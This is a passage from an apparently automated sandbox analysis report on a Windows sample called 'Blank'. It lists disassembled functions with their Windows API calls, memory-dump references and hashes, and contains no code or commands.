                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1378193009-0
                                                                                                                                    • Opcode ID: f38b5a3deec734a587ab5897d25761fd68438a025e30cd1cfdcca468c0c4ec7b
                                                                                                                                    • Instruction ID: bfacc1ec07d1a68d3ab8aea3135d630923713d09b961f039aedbcf5703641f00
                                                                                                                                    • Opcode Fuzzy Hash: f38b5a3deec734a587ab5897d25761fd68438a025e30cd1cfdcca468c0c4ec7b
                                                                                                                                    • Instruction Fuzzy Hash: 65210070914794AFE7738B649889BFBFBECAF01308F00448DE68E56282C3B02995CB51
                                                                                                                                    Function 002C4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002C4385
                                                                                                                                    • _memset.LIBCMT ref: 002C43A6
                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002C43F8
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002C4401
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1157408455-0
                                                                                                                                    • Opcode ID: 626ecc7cb5a8e36f91eaf0efaa2c0d45f2748a66188539b19f0186c39c1c7db9
                                                                                                                                    • Instruction ID: acc96000958dee86cb29c3e16ab6b6107b0df90a80a86a98fd963e0a6933bb01
                                                                                                                                    • Opcode Fuzzy Hash: 626ecc7cb5a8e36f91eaf0efaa2c0d45f2748a66188539b19f0186c39c1c7db9
                                                                                                                                    • Instruction Fuzzy Hash: 7711CB759112287AD7309B65AC4DFBBBB7CEF44770F10469AF908D7180D2704E40CBA4
                                                                                                                                    Function 002D6A54 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0027402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002C7E51,?,?,00000000), ref: 00274041
                                                                                                                                      • Part of subcall function 0027402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002C7E51,?,?,00000000,?,?), ref: 00274065
                                                                                                                                    • #52.WSOCK32(?,?,?), ref: 002D6A84
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D6A8F
                                                                                                                                    • _memmove.LIBCMT ref: 002D6ABC
                                                                                                                                    • #11.WSOCK32(?), ref: 002D6AC7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$#111_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 70051993-0
                                                                                                                                    • Opcode ID: 6d2764cee7b266d6fe8e6316e2068260d3b4b207f5f5c382fa212e1a04325d24
                                                                                                                                    • Instruction ID: a9001e9a2a5fe031f197777b3c807e0f1cc2aaee47c2e52b8bd2458108a48dc3
                                                                                                                                    • Opcode Fuzzy Hash: 6d2764cee7b266d6fe8e6316e2068260d3b4b207f5f5c382fa212e1a04325d24
                                                                                                                                    • Instruction Fuzzy Hash: F0115176910109AFCB05FFA4DD86CEEB7B8AF04350B148065F506A72A2DF319E24CFA1
                                                                                                                                    Function 0026166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 002616B4
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0029B93C
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0029B946
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0029B951
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                    • Opcode ID: 5fc4157aed00d35dadfd8bc879f7cb8debb0d7faa1898c75cb3c0671b9d44e3c
                                                                                                                                    • Instruction ID: 9d0ac359bc344a3acd18f9ad9399bef6f5a7e8f2c481f72d4386730fe2bbdabf
                                                                                                                                    • Opcode Fuzzy Hash: 5fc4157aed00d35dadfd8bc879f7cb8debb0d7faa1898c75cb3c0671b9d44e3c
                                                                                                                                    • Instruction Fuzzy Hash: 06110479A2001AABCB14EF68D8899BE77B8FB05310F580855E952E7151C730BAA1CFA5
                                                                                                                                    Function 002B96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002B9719
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002B972B
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002B9741
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002B975C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 0f4cc44caf6543c5d58a7e7f5b816ffc488d7faaf8723c499d22814a4101df35
                                                                                                                                    • Instruction ID: c8fbad4bf72da5ae7bc5577aa910ba853d048c101d7d95456574b4de922fc9de
                                                                                                                                    • Opcode Fuzzy Hash: 0f4cc44caf6543c5d58a7e7f5b816ffc488d7faaf8723c499d22814a4101df35
                                                                                                                                    • Instruction Fuzzy Hash: CA114C79910218FFDB11DF95C984EDDFBB8FB48750F204091EA00B7250DA716E60EB94
                                                                                                                                    Function 00262111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0026214F
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00262163
                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0026216D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                    • Opcode ID: af5b7d559f5fa64bf91635b5f963d34bc0006f86ff58ac3bfa1f0fe14a0dbeda
                                                                                                                                    • Instruction ID: 100bd3d5a613dbfbf8e2c5b5541da0a2feeca8821c44d3125101d416eb4e11ec
                                                                                                                                    • Opcode Fuzzy Hash: af5b7d559f5fa64bf91635b5f963d34bc0006f86ff58ac3bfa1f0fe14a0dbeda
                                                                                                                                    • Instruction Fuzzy Hash: 0E118B72115A09BFEF124F90AC84EEBBB6DEF593A4F040156FA1852011C7319CA1DFA0
                                                                                                                                    Function 002C1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002C04EC,?,002C153F,?,00008000), ref: 002C195E
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002C04EC,?,002C153F,?,00008000), ref: 002C1983
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002C04EC,?,002C153F,?,00008000), ref: 002C198D
                                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,002C04EC,?,002C153F,?,00008000), ref: 002C19C0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                    • Opcode ID: aa404dc98a7f5f2a7af3b98fff5258acd34e29e2ddb53bfb692545d7a1b4aa76
                                                                                                                                    • Instruction ID: f429dc51f0c9a60737a617be0744e85c40b85db5205aa65ba00dff212bdc491b
                                                                                                                                    • Opcode Fuzzy Hash: aa404dc98a7f5f2a7af3b98fff5258acd34e29e2ddb53bfb692545d7a1b4aa76
                                                                                                                                    • Instruction Fuzzy Hash: 44115A31C2051DDBCF009FA4E99ABEEBB78FF0A751F004259E985B2242CB309670CB91
                                                                                                                                    Function 002EE1CE Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002EE1EA
                                                                                                                                    • #183.OLEAUT32(?,00000002,0000000C), ref: 002EE201
                                                                                                                                    • #163.OLEAUT32(0000000C,?,00000000), ref: 002EE216
                                                                                                                                    • #442.OLEAUT32(0000000C,?,00000000), ref: 002EE234
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: #163#183#442FileModuleName
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2875472535-0
                                                                                                                                    • Opcode ID: 36f2cb2fe7ed12c06fb4529159f6d0728e4d9740ae3185323a21238b58df59f0
                                                                                                                                    • Instruction ID: 14f4362b717b965a727814ce025057ec48661e16fec112c0c60cf50ac4ec3d84
                                                                                                                                    • Opcode Fuzzy Hash: 36f2cb2fe7ed12c06fb4529159f6d0728e4d9740ae3185323a21238b58df59f0
                                                                                                                                    • Instruction Fuzzy Hash: 651182B4251305DBEB308F52ED0CFA37BBCEB00B10F508569AB15DA141D7B0E918DBA1
                                                                                                                                    Function 002971E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                    • Instruction ID: d1441b11300d6b8c2c0196085b873483c6a3e5d06dbcaf7aa8568bced410e1cb
                                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                    • Instruction Fuzzy Hash: 5F01487287824ABBCF126F84CC418EE3F62BB19354B588516FE1858131D236C9B1AB91
                                                                                                                                    Function 002EB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002EB956
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002EB96E
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002EB992
                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002EB9AD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                    • Opcode ID: 063af6800da2ca49667c7836c006e34293680ff00864fb271403def5f6e9a1b8
                                                                                                                                    • Instruction ID: f202e13db62454804fd5125dce8f7deb9c981a27a2c101a6c214fd007bc2640d
                                                                                                                                    • Opcode Fuzzy Hash: 063af6800da2ca49667c7836c006e34293680ff00864fb271403def5f6e9a1b8
                                                                                                                                    • Instruction Fuzzy Hash: 9F1163B9D0020AEFDB41CF99D984AEEBBF9FB48310F104166E914E3211D731AA61CF50
                                                                                                                                    Function 002EBCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002EBCB6
                                                                                                                                    • _memset.LIBCMT ref: 002EBCC5
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00328F20,00328F64), ref: 002EBCF4
                                                                                                                                    • CloseHandle.KERNEL32 ref: 002EBD06
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3277943733-0
                                                                                                                                    • Opcode ID: 784bc00ab7afb2de10c400eb7405e8d3fa58a61e4570c60bec46a124502ece77
                                                                                                                                    • Instruction ID: 0c01e10a4fe3020d7cdae59f7f4e6c6224ae8f70a814c686f62a6f8bb8eb354f
                                                                                                                                    • Opcode Fuzzy Hash: 784bc00ab7afb2de10c400eb7405e8d3fa58a61e4570c60bec46a124502ece77
                                                                                                                                    • Instruction Fuzzy Hash: 53F0E2B25423107FF3213B61BC09FBB3B5DEB08760F000424BA08D51A6DB714C1087B8
                                                                                                                                    Function 002C7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 002C71A1
                                                                                                                                      • Part of subcall function 002C7C7F: _memset.LIBCMT ref: 002C7CB4
                                                                                                                                    • _memmove.LIBCMT ref: 002C71C4
                                                                                                                                    • _memset.LIBCMT ref: 002C71D1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 002C71E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 48991266-0
                                                                                                                                    • Opcode ID: 14b97a1b7a499d7498a25bd8ae55e122cd147e546e49b300377ad586861c0f66
                                                                                                                                    • Instruction ID: 512a2d235d52ccf906ff8363c2ee6799beef6b206a5c9be5d266f5cda7e28446
                                                                                                                                    • Opcode Fuzzy Hash: 14b97a1b7a499d7498a25bd8ae55e122cd147e546e49b300377ad586861c0f66
                                                                                                                                    • Instruction Fuzzy Hash: 49F0D07A101104ABCB416F55EC89F5ABB29EF45360F14C065FE085E25BC731A961DFB4
                                                                                                                                    Function 002EC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002616CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00261729
                                                                                                                                      • Part of subcall function 002616CF: SelectObject.GDI32(?,00000000), ref: 00261738
                                                                                                                                      • Part of subcall function 002616CF: BeginPath.GDI32(?), ref: 0026174F
                                                                                                                                      • Part of subcall function 002616CF: SelectObject.GDI32(?,00000000), ref: 00261778
                                                                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002EC3E8
                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 002EC3F5
                                                                                                                                    • EndPath.GDI32(00000000), ref: 002EC405
                                                                                                                                    • StrokePath.GDI32(00000000), ref: 002EC413
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                    • Opcode ID: 8d202f402ecdf9e5f54da89c3db687ccf5b26c8222824f6abfa660f881d26388
                                                                                                                                    • Instruction ID: f3fb8447b639148f826b99cf658586c72737ef80e8dbd0037b409fcd2385b249
                                                                                                                                    • Opcode Fuzzy Hash: 8d202f402ecdf9e5f54da89c3db687ccf5b26c8222824f6abfa660f881d26388
                                                                                                                                    • Instruction Fuzzy Hash: 46F0E231046259BBDB232F91AC0EFEE3F59AF05361F048014FA11311E28B741562DFA9
                                                                                                                                    Function 002BAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002BAA6F
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002BAA82
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002BAA89
                                                                                                                                    • AttachThreadInput.USER32(00000000), ref: 002BAA90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
